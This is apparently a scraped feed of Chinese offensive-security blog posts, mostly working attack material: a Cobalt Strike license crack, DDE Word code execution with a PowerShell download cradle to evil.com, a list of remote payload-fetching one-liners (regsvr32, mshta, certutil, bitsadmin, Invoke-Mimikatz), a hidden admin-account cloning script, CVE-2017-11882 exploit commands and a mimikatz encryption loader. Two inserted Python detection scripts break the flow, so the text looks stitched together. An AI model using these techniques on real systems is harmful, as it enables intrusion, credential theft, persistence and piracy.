    Whoever says OAuth 2.0 is vulnerable / that this protocol is insecure, stick your head out for a moment, the bricks are ready. Black Hat's talk on Pa […]

  • 11/08/16--00:28: Notes on the 10th printing (chan 69772724)
  • The book 《Web前端黑客技术揭秘》 has been on sale since January 2013 and has now reached its 10th printing; among security books, that result truly exceeds our […]


    Seebug Paper previously collected three related articles: Bypassing mixed-content warnings – on a secure page […]


    JSON hijacking techniques for the modern Web http://paper.seebug.org/130/ The sneaky-trick crowd actually […]

  • 12/01/16--19:47: [PRE] CSRF attacks: Attack on Titan (chan 69772724)
  • I plan to put together a slide deck dedicated to the various clever tricks in CSRF, beyond the well-worn techniques: https://github. […]


    A new year, a fresh start. I tested this worm on a small scale, submitted it to the vendor for a fix, and shared it within a small circle; here it is published officially, for research rather than destruction […]

  • 03/05/17--00:37: A cryptomining worm case, uncensored (chan 69772724)
  • Early this morning our honeynet system popped up an interesting string: zaxa2aq@protonmail.com ProtonMa […]

  • 05/18/17--19:39: Front-end hacking online tool XSS’OR (chan 69772724)
  • This is a free online front-end hacking tool, currently made up of 3 main modules: 1. Encode/Decode module, which includes: […]


    XSS’OR is now open source, under the BSD license, which is very permissive: no restrictions on distribution or commercial use, just keep the author's copyright notice. Below […]

  • 09/06/17--22:50: Cobalt Strike 3.8 cracked version (chan 69772723)
  • I had wanted to download 3.8 for a while but could not find it; then I saw a friend's comment sharing a link to a trial version (safety unknown).

    链接:https://f001.backblazeb2.com/file/thedarkcloud/cobaltstrike/cobaltstrike-trial.tgz

    Then I downloaded it and found that it is not a cracked version (screenshot).

    So I made a simple modification and am sharing the method so everyone can use it.
    First, unzip cobaltstrike.jar; after extracting, find common\License.class and decompile it with jad.

    C:\Users\evi1cg\Desktop\jad>jad License.class
    Parsing License.class... Generating License.jad
    

    Then edit License.jad and change the following parameter: find life and change it to 65535L (screenshot).

    Then rename License.jad to License.java, place it in the root directory of the extracted CobaltStrike, and compile it with javac.

    javac -classpath . License.java
    

    After compiling you get License.class; open the unextracted CobaltStrike with WinRAR and replace the original License.class with the modified one.

    If you don't want the dialog box to pop up at startup, compile the following License.java instead:

    package common;
    
    import aggressor.Prefs;
    
    public class License
    {
    
        public License()
        {
        }
    
        private static long getTimeSinceStart()
        {
            Prefs prefs = Prefs.getPreferences();
            today = System.currentTimeMillis();
            start = prefs.getLongNumber("cobaltstrike.start.int", 0L);
            if(start == 0L)
            {
                prefs.set("cobaltstrike.start.int", (new StringBuilder()).append("").append(today).append("").toString());
                prefs.save();
                start = today;
            }
            difference = (today - start) / 0x5265c00L;
            return difference;
        }
    
        public static void checkLicenseGUI()
        {
            getTimeSinceStart();
        }
    
        public static boolean isTrial()
        {
            return true;
        }
    
        public static void checkLicenseConsole()
        {
        }
    
        private static long life = 65535L;
        private static long today = 0L;
        private static long start = 0L;
        private static long difference = 0L;
    
    }
    

    There is a pitfall here: following that article to crack it is problematic, because it changes the return value of common.License.isTrial() directly to false.

    public static boolean isTrial()
      {
        return true;
        // this function must be modified
        // return false; //edit here
      }
    

    This causes the XorEncode handler in the ArtifactUtils class to go straight into encoding the payload.

        public static byte[] XorEncode(byte data[], String arch)
        {
            if(License.isTrial())
            {
                CommonUtils.print_trial((new StringBuilder()).append("Disabled ").append(arch).append(" payload stage encoding.").toString());
                return data;
            }
            AssertUtils.Test(data.length > 16384, "XorEncode used on a stager (or some other small thing)");
            AssertUtils.TestArch(arch);
            if("x86".equals(arch))
            {
                byte decoder[] = CommonUtils.pickOption("resources/xor.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            }
            if("x64".equals(arch))
            {
                byte decoder[] = CommonUtils.readResource("resources/xor64.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            } else
            {
                return new byte[0];
            }
        }
    

    But since the trial version does not contain xor.bin or xor64.bin, this makes it impossible to create a listener. So we'd better only change the time. Our CS is then usable; the drawback is that payloads cannot be encoded (screenshot).

    Download link for the modified version: link: click here, password: 86f3. Verify its safety yourself!!


  • 10/04/17--00:17: WordPress firewall (chan 69772724)
  • I have used it for a long time and recommend it: Wordfence Security. Explore the details yourself; let me talk about something else. WordPress […]

  • 10/10/17--19:59: MSWord Code Exec Without Macro (chan 69772723)
  • Today I learned a new way to execute code from Word, one that also does not require enabling macros, so I'm sharing it with everyone. The steps are quite simple.
    First create a new Word document, then insert a field (screenshot).

    Select = (Formula) (screenshot).

    Right-click and choose Toggle Field Codes (screenshot).

    Change the field code to:

    {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }
    


    Then right-click, Update Field, and save the document in docx format. The final result is as follows (animation).

    The somewhat awkward part is that it only executes after the user clicks Yes.

    Besides DDEAUTO, DDE also works, as follows:

    {DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
    

    Note that with DDE it does not execute automatically; you have to modify the document: rename it to .rar, open it, edit word/settings.xml and add

    <w:updateFields w:val="true"/>
    

    Using DDE, the effect is as follows (animation).

    Personally I feel DDE works better.

    How do you get an interactive shell?

    { DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "}
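
As an added defensive example (not part of the original post), the following Python scanner looks inside a .docx for the DDE/DDEAUTO field codes and the `w:updateFields` setting described above. It builds a minimal constructed document rather than reading a real one, and assumes the standard WordprocessingML layout (`word/document.xml`, `word/settings.xml`, `w:` prefix).

```python
"""Static scanner for DDE/DDEAUTO field codes inside a .docx (constructed sample)."""
import html
import io
import re
import zipfile
from typing import Dict, List, Tuple

# Field instructions Word hands to Dynamic Data Exchange. DDEAUTO runs when the
# document is opened; DDE runs when fields are updated, which is why it is paired
# with <w:updateFields w:val="true"/> in word/settings.xml.
DDE_FIELD_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
UPDATE_FIELDS_RE = re.compile(r'<w:updateFields\b[^>]*w:val="(?:true|1|on)"', re.IGNORECASE)
# A field is either <w:fldSimple w:instr="..."/> or a run of
# fldChar begin -> instrText* -> fldChar separate -> result -> fldChar end.
TOKEN_RE = re.compile(
    r'<w:fldChar\b[^>]*w:fldCharType="(begin|separate|end)"[^>]*>'
    r"|<w:instrText\b[^>]*>(.*?)</w:instrText>"
    r'|<w:fldSimple\b[^>]*w:instr="([^"]*)"',
    re.DOTALL,
)


def extract_field_codes(xml: str) -> List[str]:
    """Return every field instruction in document order, joining the instrText
    runs that belong to one field (nested fields are flattened into the parent)."""
    fields: List[str] = []
    buf: List[str] = []
    depth = 0
    for m in TOKEN_RE.finditer(xml):
        kind, instr, simple = m.group(1), m.group(2), m.group(3)
        if simple is not None:
            fields.append(simple)
        elif kind == "begin":
            depth += 1
        elif kind == "end":
            depth -= 1
            if depth == 0 and buf:
                fields.append("".join(buf))
                buf = []
        elif instr is not None and depth > 0:
            buf.append(instr)
    return [html.unescape(f).strip() for f in fields]


def scan_docx(data: bytes) -> Dict[str, object]:
    """Inspect every word/*.xml part (body, headers, footers, settings)."""
    dde_fields: List[Tuple[str, str]] = []
    update_fields = False
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = zf.read(name).decode("utf-8", "replace")
            if name == "word/settings.xml":
                update_fields = UPDATE_FIELDS_RE.search(xml) is not None
            for code in extract_field_codes(xml):
                if DDE_FIELD_RE.search(code):
                    dde_fields.append((name, code))
    return {"dde_fields": dde_fields, "update_fields": update_fields,
            "suspicious": bool(dde_fields)}


W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def build_sample_docx(field_code: str, update_fields: bool) -> bytes:
    """Constructed minimal .docx with one complex field whose instruction is
    split across two instrText runs, as Word itself often writes it."""
    runs = "".join(
        f'<w:r><w:instrText xml:space="preserve">{html.escape(part)}</w:instrText></w:r>'
        for part in (field_code[:10], field_code[10:])
    )
    document = (
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        "<w:r><w:t>!Unexpected End of Formula</w:t></w:r>"
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        "</w:p></w:body></w:document>"
    )
    flag = '<w:updateFields w:val="true"/>' if update_fields else ""
    settings = f'<w:settings xmlns:w="{W_NS}">{flag}</w:settings>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # placeholder part
        zf.writestr("word/document.xml", document)
        zf.writestr("word/settings.xml", settings)
    return buf.getvalue()


if __name__ == "__main__":
    for code, upd in (('DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"', False),
                      ('DDE "c:\\windows\\system32\\cmd.exe" "/c notepad"', True),
                      ("= 1 + 2", False)):
        print(scan_docx(build_sample_docx(code, upd)))
```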
    


    Friends often run into a command-execution vulnerability and don't know how to use it, for example command execution from an MSSQL injection point: how do you get a meterpreter? At that point you have to find a way. I have come across many ways of executing a remote command from the command line, but I never remember them when I need them, so here I summarize the ones I've encountered; maybe one of these methods will help you. (Of course, we don't cover the case where you can simply echo a webshell.)

    1. powershell

    eg:

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    

    2. regsvr32

    eg:

    regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
    

    js.png

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                ps  = "cmd.exe /c calc.exe";
                new ActiveXObject("WScript.Shell").Run(ps,0,true);
    
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    3. rundll32

    eg:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
    

    Details: see here

    4. mshta

    eg:

    mshta http://site.com/calc.hta
    

    calc.hta

    <HTML>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD>
    <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
    self.close
    </script>
    <body>
    demo
    </body>
    </HEAD>
    </HTML>
    

    5. pubprn.vbs

    eg:

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    6. bitsadmin

    eg:

    cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
    

    7. python (must be installed)

    eg:

    python -c "import urllib2; exec urllib2.urlopen('http://site.com/abc').read();"
    

    abc

    import base64; exec base64.b64decode("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")
    

    8. certutil

    eg:

    certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    9. msiexec

    msiexec /q /i http://site.com/payloads/calc.png
    

    calc.png

    msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
    

    10. msxsl.exe (must be downloaded)

    eg:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
    
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    11. IEExec

    eg:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe
    

    Details: click here

    12. IEXPLORE.EXE

    This requires IE to have a command-execution vulnerability
    eg:

    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp
    

    The exploit can be something like ms14_064

    There are surely many more methods; feel free to add them in the comments!!
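As an added defensive example, not from the original post, the following Python script runs detection rules for the living-off-the-land command lines listed above (plus the Office-spawns-a-shell process-tree signature that covers the DDE and CVE-2017-11882 documents on this page) over a few constructed Sysmon-style process-creation records. The one-line log layout, sample paths and URLs are assumptions made for the example.

```python
"""Detection rules for the remote-execution one-liners above, run over
constructed Sysmon-style process-creation records (simplified field layout)."""
import re
from typing import List, NamedTuple, Optional, Tuple


class Event(NamedTuple):
    image: str
    parent: str
    cmdline: str


# Assumed one-line layout; real Sysmon/EDR exports need their own parser.
EVENT_RE = re.compile(
    r'^Image=(?P<image>.+?)\s+ParentImage=(?P<parent>.+?)\s+CommandLine="(?P<cmd>.*)"$'
)

# Each rule keys on the binary plus the argument that turns it into a downloader
# or script host, so ordinary use (certutil -hashfile, msiexec on a local .msi)
# stays quiet.
RULES = [
    (name, re.compile(rx, re.IGNORECASE)) for name, rx in [
        ("powershell_downloadstring", r"\bpowershell(?:\.exe)?\b.*?DownloadString\("),
        ("regsvr32_remote_scriptlet", r"\bregsvr32(?:\.exe)?\b.*?/i:\s*https?://"),
        ("rundll32_script_moniker", r"\brundll32(?:\.exe)?\b.*?\bjavascript:"),
        ("mshta_remote_or_inline", r"\bmshta(?:\.exe)?\b.*?\b(?:https?|javascript|vbscript):"),
        ("pubprn_script_moniker", r"\bpubprn\.vbs\b.*?\bscript:"),
        ("bitsadmin_transfer", r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b"),
        ("python_remote_exec", r"\bpython(?:\.exe)?\b.*?\bexec\b.*?urlopen\("),
        ("certutil_urlcache_download", r"\bcertutil(?:\.exe)?\b.*?-urlcache\b.*?https?://"),
        ("msiexec_remote_package", r"\bmsiexec(?:\.exe)?\b.*?/i\s+https?://"),
        ("msxsl_remote_stylesheet", r"\bmsxsl(?:\.exe)?\b.*?https?://"),
        ("ieexec_remote_assembly", r"\bieexec(?:\.exe)?\b.*?https?://"),
        ("caspol_security_off", r"\bcaspol(?:\.exe)?\b.*?-s\s+off\b"),
    ]
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> Optional[Event]:
    m = EVENT_RE.match(line.strip())
    return Event(m["image"], m["parent"], m["cmd"]) if m else None


def match_rules(ev: Event) -> List[str]:
    hits = [name for name, rx in RULES if rx.search(ev.cmdline)]
    # Office spawning a shell or script host is the process-tree signature of the
    # DDE field and the CVE-2017-11882 document described on this page.
    if _basename(ev.parent) in OFFICE_APPS and _basename(ev.image) in SCRIPT_HOSTS:
        hits.append("office_spawned_shell")
    return hits


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, rule names) for every flagged record."""
    flagged = []
    for no, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev is not None:
            hits = match_rules(ev)
            if hits:
                flagged.append((no, hits))
    return flagged


# Constructed sample records: six suspicious, two benign (lines 4 and 6).
SAMPLE_LOG = r"""
Image=C:\Windows\System32\cmd.exe ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE CommandLine="cmd.exe /k calc.exe"
Image=C:\Windows\System32\regsvr32.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="regsvr32 /u /s /i:http://site.com/js.png scrobj.dll"
Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="mshta http://site.com/calc.hta"
Image=C:\Windows\System32\certutil.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="certutil -hashfile setup.exe SHA256"
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\System32\cmd.exe CommandLine="powershell IEX (New-Object Net.WebClient).DownloadString('http://site.com/a.ps1')"
Image=C:\Windows\System32\msiexec.exe ParentImage=C:\Windows\explorer.exe CommandLine="msiexec /i C:\installers\app.msi /qn"
Image=C:\Windows\System32\cmd.exe ParentImage=C:\Windows\System32\sqlservr.exe CommandLine="cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe"
Image=C:\Windows\System32\mshta.exe ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE CommandLine="mshta http://site.com/abc"
"""
SAMPLE_LINES = SAMPLE_LOG.strip().splitlines()

if __name__ == "__main__":
    for no, hits in scan_log(SAMPLE_LINES):
        print(f"line {no}: {', '.join(hits)}")
```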



    Recently while testing I found that on Windows Server 2012 Mimikatz cannot grab plaintext passwords directly, and that logging in with a freshly created account sometimes runs into this problem (screenshot).

    PS: grabbing plaintext on 2012 requires "UseLogonCredential" under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to be set to 1 (type DWORD 32); only after the user logs in again will the plaintext password be recorded.

    Later I found that the old trick of creating a cloned account lets the newly created account log into the system. For convenience I put together a PowerShell script that automatically changes the registry key permissions (it must be run with administrator privileges, i.e. the privileges obtained after bypassing UAC) and then performs the operations. The code is as follows:

    function Create-Clone
    {
    <#
    .SYNOPSIS
    This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.
    .PARAMETER u
    The clone username
    .PARAMETER p
    The clone user's password
    .PARAMETER cu
    The user to clone, default administrator
    .EXAMPLE
    Create-Clone -u evi1cg -p evi1cg123 -cu administrator
    #>
        Param(
            [Parameter(Mandatory=$true)]
            [String]
            $u,
    
            [Parameter(Mandatory=$true)]
            [String]
            $p,
    
            [Parameter(Mandatory=$false)]
            [String]
            $cu = "administrator"
        )
        function upReg{
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] >> $env:temp\up.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17] >> $env:temp\up.ini"
            cmd /c "regini $env:temp\up.ini"
            Remove-Item $env:temp\up.ini
    
        }
        function downreg {
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] >> $env:temp\down.ini"
            cmd /c "echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17] >> $env:temp\down.ini"
            cmd /c "regini $env:temp\down.ini"
            Remove-Item $env:temp\down.ini
        }
        function Create-user ([string]$Username,[string]$Password) {
            $group = "Administrators"
            $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
            if (!$existing) {
                Write-Host "[*] Creating new local user $Username with password $Password"
                & NET USER $Username $Password /add /y /expires:never | Out-Null
                Write-Host "[*] Adding local user $Username to $group."
                & NET LOCALGROUP $group $Username /add | Out-Null
    
            }
            else {
                $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
                $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
                Write-Host "[*] Setting password for existing local user $Username"
                $exist.SetPassword($Password)
            }
    
            Write-Host "[*] Ensuring password for $Username never expires."
            & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE   | Out-Null
        }
        function GetUser-Key([string]$user)
        {
            if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){
                cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""
                $file = Get-Content "$env:temp\$user.reg"  | Out-String
                $pattern="@=hex\((.*?)\)\:"
                $file -match $pattern |Out-Null
                $key = "00000"+$matches[1]
                Write-Host "[!]"$key
                return $key
            }else {
                Write-Host "[-] SomeThing Wrong !"
            }
    
        }
        function Clone ([string]$ukey,[string]$cukey) {
            $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String
            $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String
            Write-Host "[*] Get clone user'F value"
            $cuFreg = Get-Item -Path $cureg.Trim()
            $cuFvalue = $cuFreg.GetValue('F')
            Write-Host "[*] Change user'F value"
            Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue
            $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"
            cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"
        }
        function Main () {
            Write-Output "[*] Start"
            Write-Output "[*] Tring to change reg privilege !"
            upReg
            if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){
                Write-Host "[-] The User to Clone does not exist"
                Write-Output "[*] Change reg privilege back !"
                downReg
                Write-Output "[*] Exiting !"
            }
            else {
                if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){
                    $tmp = "1"
                }
                else{
                    $tmp = "0"
                }
                Write-Output "[*] Create User..."
                Create-user $u $p
                Write-Output "[*] Get User $u's  Key .."
                $ukey = GetUser-Key $u |Out-String
                Write-Output "[*] Get User $cu's  Key .."
                $cukey = GetUser-Key $cu |Out-String
                Write-Output "[*] Clone User.."
                Clone $ukey $cukey
                if($tmp -eq 1 ){
                    Write-Output "[*] Delete User.."
                    cmd /c "net User $u /del " |Out-Null
                }else{ Write-Output "[*] Don't need to delete.."}
                cmd /c "regedit /s $env:temp\$u.reg"
                cmd /c "regedit /s $env:temp\out.reg"
                Remove-Item $env:temp\*.reg
                Write-Output "[*] Change reg privilege back !"
                downreg
                Write-Output "[*] Done"
            }
        }
        Main
    }
    

    GITHUB:

    After the account is created, it can log into the system successfully (screenshot).

    The test on Win7 is as follows (demo animation).

    This can of course be combined with the following trick to allow multiple users to log in.

    Using mimikatz.exe, run ts::multirdp to allow multiple remote logins.

    PS: this method stops working after a reboot; next time you need to run ts::multirdp again, or you can make the change permanent by modifying termsrv.dll.


  • 11/20/17--21:32: Exploiting CVE-2017-11882 (chan 69772723)
  • CVE-2017-11882 has been quite hot recently. For the vulnerability itself, see: analysis of a POC sample of the Office remote code execution vulnerability hidden for 17 years (CVE-2017-11882)

    Today I saw someone share a POC on Twitter (twitter address, poc address); later I saw someone share a project, CVE-2017-11882. I took a quick look: it achieves command execution by modifying an rtf file, but one drawback is that the project uses WebDAV to execute the remote file, which may not be easy to use, so I made a simple modification to the file. The project address is: GITHUB:
    Usage is simple. To execute a command:

    python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    


    For further exploitation, see my earlier post 《windows命令执行漏洞不会玩? 看我!》 (Windows command-execution vulnerability and don't know how to use it? Look here!). Because of the length limit, mshta can be used to execute. The constructed command is:

    python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
    

    The final result is as follows (animation).


  • 12/19/17--06:03: Loading the latest Mimikatz with .NET 2.0 (chan 69772723)
  • 0x00 Preface

    subtee previously published a script that uses .NET 2.0 to load mimikatz; someone's fork of the source is here. Today I saw that a new mimikatz version has been released, so I took a look at this code and tried to use it to load the new version of mimikatz. The process is as follows.

    0x01 Generating the encrypted string

    Looking at the code, it contains the encrypted strings for the 32-bit and 64-bit mimikatz, so we only need to replace them. For convenience I pulled out the encryption code, as follows:

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    /*
    Author: Evi1cg, Twitter: @Evi1cg
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /out:encode.exe  /unsafe encode.cs
    */
    
    namespace test
    {
        class Program
        {
            public class Misc
        {
            //Change This!
            private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
            public static void Stage(string fileName, string Key, string outFile)
            {
    
                byte[] raw = FileToByteArray(fileName);
                byte[] file = Encrypt(raw, Key);
    
                FileStream fileStream = File.Create(outFile);
    
                fileStream.Write(file, 0, file.Length);//Write stream to temp file
    
                Console.WriteLine("File Ready, Now Deliver Payload");
    
            }
    
            public static byte[] FileToByteArray(string _FileName)
            {
                byte[] _Buffer = null;
                System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
                System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
                long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
                _Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
                _FileStream.Close();
                _FileStream.Dispose();
                _BinaryReader.Close();
                return _Buffer;
            }
    
            public static byte[] Encrypt(byte[] plain, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(plain, 0, plain.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
            public static byte[] Decrypt(byte[] cipher, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(cipher, 0, cipher.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
    
            public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
            {
                byte[] buffer = new byte[16 * 1024];
                using (MemoryStream ms = new MemoryStream())
                {
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        ms.Write(buffer, 0, read);
                    }
                    return ms.ToArray();
                }
            }
    
        }//End Misc Class
            static void Main(string[] args)
            {
                if (args.Length < 3)
                {
                    Console.WriteLine("usage: encode.exe input.exe out.txt password");
                }
                else
                {
                    string fileinput = args[0];
                    string fileoutput = args[1];
                    string password = args[2];
                    byte[] b  = Misc.FileToByteArray(fileinput);
                    byte[] e = Misc.Encrypt(b,password);
                    string f = System.Convert.ToBase64String(e);
                    File.WriteAllText(fileoutput,f);
    
                }
            }
        }
    }
    

    It can be compiled with csc. The first argument is the input file path, the second the output file path, and the third the encryption password. This password must match the one in katz2.0.cs, and the SALT in the script must also match; the SALT is a random set of bytes that makes unauthorized decryption harder.

    The encryption process is as follows (screenshot).

    0x02 Modifying katz2.0.cs

    Modify the mimikatz string contents in katz2.0.cs, at the very bottom of the code below ~

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    
    /*
    Author: Casey Smith, Twitter: @subTee
    License: BSD 3-Clause
    
    Create Your Strong Name Key -> key.snk
    
    $key = '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'
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
    x64
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe katz.exe
    
    [OR]
    C:\Windows\Microsoft.NET\Framework\vv2.0.50727\regasm.exe katz.exe
